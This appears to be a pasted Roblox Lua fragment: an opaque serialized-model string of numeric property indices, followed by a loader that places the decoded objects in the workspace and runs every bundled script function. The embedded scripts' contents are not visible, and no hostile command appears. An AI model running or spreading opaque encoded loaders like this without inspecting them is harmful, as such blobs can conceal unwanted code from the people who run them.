- ..'p;1|1:421|2:2|3:2767|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2768|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2769|15:153|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|3:2770|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:2771|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;9|9:677|10:2772;p;1|2:2|3:2773|15:2630|4:755;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:2774|15:153|4:757|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;2|1:765;n;2|1:16;n;2|1:17;n;1|1:18|5:19|14:2|3:2775|15:153|16:22|4:23|17:24|18:25|5:19|5:19;n;5|3:26|19:27;6|20:27;7;8|1:28;9|9:10|10:29;9|9:10|10:1607;p;10|5:32|3:2776|15:153|16:1300|4:35|17:25|18:24|5:32|5:32;1|1:36|5:37|3:2777|15:153|16:1302|4:40|17:24|21:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;7;12|1:45|25:46;12|1:45|25:46;12|1:45|25:47;12|1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:2778|15:153|16:1304|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:2779|15:153|16:1306|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;1|1:73|5:37|3:2780|15:153|16:1308|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;12|1:45|25:81;12|1:45|25:82;12|1:45|25:81;1|1:83|5:84|3:2781|15:153|16:1310|4:87|17:24|5:84|5:84;n;7;9|9:185|10:1311;9|9:10|10:88;p;12|1:45|25:89;12|1:45|25:90;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:'
- ..'45|25:95;12|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:2782|15:297|16:1313|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:1314;9|9:119|10:120;p;1|1:113|5:84|3:2783|15:153|16:1316|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:158|10:2784;9|9:237|10:796;9|9:124|10:125;p;1|1:113|5:32|3:2785|15:153|16:1319|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;9|9:237|10:799;p;1|1:113|5:131|3:2786|15:1322|16:1323|4:135|17:25|18:25|5:131|5:131;n;11;p;1|1:113|5:19|3:2787|15:150|16:1326|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:143;9|9:141|10:142;p;1|1:113|5:19|3:2788|15:150|16:1329|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:2789;p;1|1:113|5:32|3:2790|15:297|16:1331|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:789|10:1624;9|9:119|10:120;p;1|1:113|5:19|3:2791|15:137|16:1333|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:119|10:2299;9|9:252|10:251;p;1|1:113|5:84|3:2792|15:21|16:1336|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:162|10:2793;p;1|1:113|5:9|3:2794|15:137|16:1346|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1535;p;1|1:113|5:19|3:2795|15:137|16:1348|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:176|10:177;9|9:391|10:266;p;1|1:113|5:9|3:2796|15:137|16:1351|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:158|10:2797;p;1|1:113|5:131|30:187|3:2798|15:1322|16:1353|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:270|10:2799;9|9:192|10:1354;p;1|1:113|5:131|3:2800|15:325|16:1356|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:199;9|9:158|10:1358;9|9:158|10:202;p;1|1:113|5:32|3:2801|15:153|16:1361'
- ..'|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:205|29:157;9|9:237|10:1363;9|9:391|10:1364;p;1|1:113|5:84|3:2802|15:370|16:1366|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|5:19|3:2803|15:297|16:1369|4:213|17:24|18:214|5:19|5:19;n;4|9:215|10:216;9|9:217|10:218;p;1|1:113|5:131|3:2804|15:1322|16:1371|4:135|17:25|18:25|5:131|5:131;n;11;9|9:223|10:1372;9|9:804|10:1324;9|9:221|10:2314;p;1|1:113|5:131|30:187|3:2805|15:1322|16:1374|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:221|10:227;p;1|1:113|5:84|3:2806|15:370|16:1376|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:258|10:2807;p;1|1:113|5:131|3:2808|15:325|16:1379|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:162|10:1359;p;1|5:19|3:2809|15:297|16:1383|4:234|17:24|18:24|5:19|5:19;n;9|9:318|10:1386;9|9:260|10:1384;9|9:124|10:1426;9|9:217|10:2810;p;1|1:113|5:19|3:2811|15:153|16:1388|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:19|3:2812|15:281|16:1391|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:1647;9|9:119|10:1648;9|9:141|10:244;p;1|1:113|5:84|3:2813|15:297|16:1393|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:256|10:1394;p;1|1:113|5:19|3:2814|15:150|16:1396|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;9|9:119|10:251;p;1|1:113|3:2815|15:297|16:1398|4:247|27:25|17:157|18:25;n;11|24:25;9|9:260|10:261;9|9:256|10:1399;4|9:258|10:259;p;1|5:84|3:2816|15:153|16:1401|4:264|31:7|17:24|32:25|18:25|5:84|5:84;n;9|9:268|10:1656;9|9:268|10:1657;9|9:265|10:896;9|9:265|10:1654;9|9:270|10:1402;9|9:221|10:2817;9|9:10|10:267;p;1|5:32|3:2818|15:21|16:1404|4:274|31:7|18:24|5:32|5:32;n;9|9:221|10:2819;9|9:270|10:2820;9|9:265|10:2326;p;1|5:19|3:2821|15:297|16:1406|4:213|17:24|18:214|5:19|5:19;n;9|9:260|10:279;9|9:904|10:1407;p;1|1:113|5:9|3:2822|15:242|16:1409|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:171|10:1570;9|9:171|10:2'
- ..'329;p;1|1:113|5:84|3:2823|15:153|16:1411|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:1412;9|9:160|10:1413;9|9:162|10:2331;p;1|1:113|5:19|3:2824|15:115|16:1416|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;p;1|1:113|5:32|3:2825|15:153|16:1422|4:312|27:25|18:25|5:32|5:32;n;11|24:25;9|9:306|10:2341;4|9:340|10:341;9|9:217|10:2826;p;1|5:19|3:2827|15:297|16:1424|4:234|17:24|18:24|5:19|5:19;n;9|9:318|10:1425;9|9:260|10:1384;9|9:124|10:1426;9|9:124|10:1385;9|9:904|10:1577;p;1|1:113|5:84|3:2828|15:370|16:1428|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;9|9:258|10:1429;p;1|1:113|5:19|3:2829|16:1431|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;9|9:178|10:1669;9|9:391|10:1432;p;1|1:113|5:19|3:2830|15:150|16:1434|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:391|10:179;9|9:178|10:266;9|9:176|10:1671;p;1|1:113|5:19|3:2831|15:281|16:1436|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:19|3:2832|16:1439|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:252|10:2833;4|9:350|10:1441;p;1|1:113|5:32|3:2834|15:153|16:1443|4:312|27:25|18:25|5:32|5:32;n;11|24:25;4|9:340|10:341;9|9:904|10:1584;p;1|1:113|5:84|3:2835|15:370|16:1445|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:252|10:1447;4|9:340|10:1448;p;1|5:19|3:2836|15:153|16:1450|4:349|31:7|5:19|5:19;n;9|9:158|10:2344;p;1|1:113|5:84|3:2837|15:370|16:1452|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:258|10:2347;p;1|1:113|5:19|3:2838|15:115|16:1454|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;p;1|1:113|5:9|3:2839|15:242|16:1458|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:19|3:2840|15:325|16:1463|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:252|10:1464;p;1|1:113|5:84|3:2841|15:207|16:1468|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:252|10:1470;p;1|5:19|3:2842|15:153|16:1472|4:349|31:7|5:19|5:19;n;4|9:350|10:'
- ..'1685;9|9:162|10:1473;4|9:353|10:379;p;1|1:113|5:380|30:187|14:381|3:2843|16:1475|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;9|9:178|10:1476;9|9:391|10:1476;p;1|1:113|5:32|3:2844|16:1478|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;9|9:178|10:390;9|9:391|10:392;p;p;p;p;1|3:2845|15:2630|4:2631|27:25|17:25|32:25|21:25|26:25|18:25;n;9|9:252|10:2846;9|9:252|10:2847;9|9:252|10:2848;p;1|2:2|3:2849|15:996|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:192|10:2277;4|9:192|10:2278;p;1|1:2850|2:2|3:2851|15:1218|4:2852|17:24|18:24;n;15;p;18|1:2850|2:2|3:2853|15:153|4:156|17:24;1|1:2854|2:2|3:2855|15:996|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;18|1:2854|2:2|3:2858|15:115|4:156|17:24;18|1:2850|2:2|3:2859|15:21|4:156|17:24;1|1:2854|2:2|3:2860|15:996|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;18|1:2854|2:2|3:2861|15:1866|4:156|17:24;18|1:2854|2:2|3:2862|15:115|4:156|17:24;1|1:421|2:2|5:19|3:2863|15:996|4:2864|17:24|18:24|5:19|5:19;n;15;p;1|1:2850|2:2|5:2865|30:2866|14:2867|3:2868|15:207|4:398|17:24|18:24|5:2865|5:2865;1|1:2850|2:2|5:19|33:1793|3:2869|15:1218|4:2870|17:24|18:24|5:19|5:19;1|1:2850|2:2|5:2865|30:2866|14:2867|3:2871|15:207|4:398|17:24|18:24|5:2865|5:2865;1|1:2850|2:2|5:19|33:1793|3:2872|15:1218|4:2870|17:24|18:24|5:19|5:19;1|1:2850|2:2|3:2873|15:996|4:2874|17:24|18:24;1|1:421|2:2|5:19|3:2875|4:2864|17:24|18:24|5:19|5:19;n;15;p;1|1:2854|2:2|5:19|33:1793|3:2876|15:996|4:2870|17:24|18:24|5:19|5:19;1|1:2854|2:2|5:2865|30:2866|14:2867|3:2877|15:325|4:398|17:24|18:24|5:2865|5:2865;1|1:2854|2:2|5:2865|30:2866|14:2867|3:2878|15:996|4:2879|17:24|18:24|5:2865|5:2865;n;15;p;1|1:2854|2:2|3:2880|15:996|4:2852|17:24|18:24;n;15;13|28:2881;13|28:2881|29:25;p;1|1:2854|2:2|5:2865|30:2866|14:2867|3:2882|15:325|4:398|17:24|18:24|5:2865|5:2865;1|1:2854|2:2|3:2883|15:1218|4:2874|17:24|18'
- ..':24;n;15;p;1|1:2854|2:2|5:19|33:1793|3:2884|15:996|4:2870|17:24|18:24|5:19|5:19;1|1:2854|2:2|3:2885|15:996|4:2852|17:24|18:24;n;15;13|28:2881;13|28:2881|29:25;p;1|1:2854|2:2|5:19|33:1793|3:2886|15:996|4:2870|17:24|18:24|5:19|5:19;1|1:2854|2:2|3:2887|15:996|4:2852|17:24|18:24;n;15;13|28:2881|29:25;13|28:2881;p;1|1:2854|2:2|5:19|33:1793|3:2888|15:996|4:2870|17:24|18:24|5:19|5:19;18|1:421|2:2|5:19|3:2889|15:115|4:2890|17:24|5:19|5:19;1|1:2854|2:2|5:19|33:1793|3:2891|15:996|4:2870|17:24|18:24|5:19|5:19;1|1:2854|2:2|3:2892|15:1218|4:2874|17:24|18:24;1|1:2854|2:2|3:2893|15:1218|4:2874|17:24|18:24;18|1:421|2:2|5:19|3:2894|15:115|4:2890|17:24|5:19|5:19;1|1:2854|2:2|5:2865|30:2866|14:2867|3:2895|15:996|4:2879|17:24|18:24|5:2865|5:2865;n;15;p;1|1:2854|2:2|5:19|33:1793|3:2896|15:996|4:2870|17:24|18:24|5:19|5:19;1|2:2|3:2897|15:137|4:2898;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:2899|15:153|4:2900|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:2901|15:996|4:2902|17:24|18:24|5:19|5:19;n;15;p;1|1:421|2:2|5:19|3:2903|15:996|4:2904|17:24|18:24|5:19|5:19;n;15;p;1|1:421|2:2|5:19|3:2905|15:996|4:2902|17:24|18:24|5:19|5:19;n;15;p;18|1:421|2:2|5:19|3:2906|15:1866|4:2890|17:24|5:19|5:19;1|1:421|2:2|5:2907|30:2908|14:2867|3:2909|15:996|4:2910|17:24|18:24|5:2907|5:2907;n;15;p;18|1:421|2:2|5:19|3:2911|15:1866|4:2890|17:24|5:19|5:19;1|1:2854|2:2|5:19|33:1793|3:2912|15:996|4:2870|17:24|18:24|5:19|5:19;1|1:2854|2:2|5:19|33:1793|3:2913|15:996|4:2870|17:24|18:24|5:19|5:19;1|2:2|3:2914|15:137|4:2915;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|2:2|3:2916|15:137|4:2917;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;p;1|1:421|2:2|5:19|3:2918|15:153|4:2900|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:2850|2:2|3:2919|15:996|4:2874|17:24|18:24;1|1:2850|2:2|5:19|33:1793|3:2920|15:1218|4:2870|17:24|18:24|5:19|5:19;1|1:2850|2:2|5:19|33:1793|'
- ..'3:2921|15:1218|4:2870|17:24|18:24|5:19|5:19;1|1:2850|2:2|5:19|33:1793|3:2922|15:1218|4:2870|17:24|18:24|5:19|5:19;1|1:2850|2:2|3:2923|15:996|4:2874|17:24|18:24;1|1:2850|2:2|5:19|33:1793|3:2924|15:1218|4:2870|17:24|18:24|5:19|5:19;1|1:2850|2:2|3:2925|15:996|4:2874|17:24|18:24;1|1:2850|2:2|5:2865|30:2866|14:2867|3:2926|15:207|4:398|17:24|18:24|5:2865|5:2865;1|1:2927|2:2|5:2907|30:2908|14:2867|3:2928|15:996|4:2910|17:24|18:24|5:2907|5:2907;n;15;p;1|1:421|2:2|5:19|3:2929|15:1809|4:2930|17:24|18:24|5:19|5:19;n;15;p;1|1:421|2:2|5:19|3:2931|15:1809|4:2930|17:24|18:24|5:19|5:19;n;15;p;1|1:421|2:2|5:19|3:2932|15:996|4:2904|17:24|18:24|5:19|5:19;n;15;p;1|1:2850|2:2|3:2933|15:1218|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;18|1:2850|2:2|3:2934|15:153|4:156|17:24;1|1:2850|2:2|3:2935|15:1218|4:2852|17:24|18:24;n;15;p;18|1:421|2:2|5:19|3:2861|15:153|4:2056|17:24|5:19|5:19;1|1:2854|2:2|3:2936|15:996|4:2852|17:24|18:24;n;15;13|28:2881|29:25;13|28:2881;p;1|1:2854|2:2|3:2937|15:996|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;18|1:2850|2:2|3:2938|15:153|4:156|17:24;1|1:421|2:2|5:19|3:2939|15:996|4:2940|17:24|18:24|5:19|5:19;n;15;p;1|1:2850|2:2|3:2941|15:1218|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;18|1:2854|2:2|3:2942|15:115|4:156|17:24;18|1:2854|2:2|3:2943|15:1866|4:156|17:24;1|1:2854|2:2|3:2944|15:996|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;1|1:2850|2:2|3:2945|15:1218|4:2852|17:24|18:24;n;15;p;18|1:2854|2:2|3:2946|15:115|4:156|17:24;18|1:2854|2:2|3:2947|15:1866|4:156|17:24;18|1:2854|2:2|3:2948|15:1866|4:156|17:24;18|1:2850|2:2|3:2949|15:21|4:156|17:24;1|1:2850|2:2|3:2950|15:1218|4:2856|17:24|18:24;n;21|38:2073|39:2073|28:2857;21|38:2073|39:2073|28:2857|29:25;p;18|1:421|2:2|5:19|3:2946|15:21|4:2056|17:24|'
- ..'5:19|5:19;1|1:421|2:2|5:19|3:2951|4:2940|17:24|18:24|5:19|5:19;n;15;p;18|1:2850|2:2|3:2952|15:21|4:156|17:24;p;')
- for _,Object in pairs(Objects) do
- Object.Parent = script and script.Parent==workspace and script or workspace
- end
- for _,f in pairs(ActualScripts) do f() end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement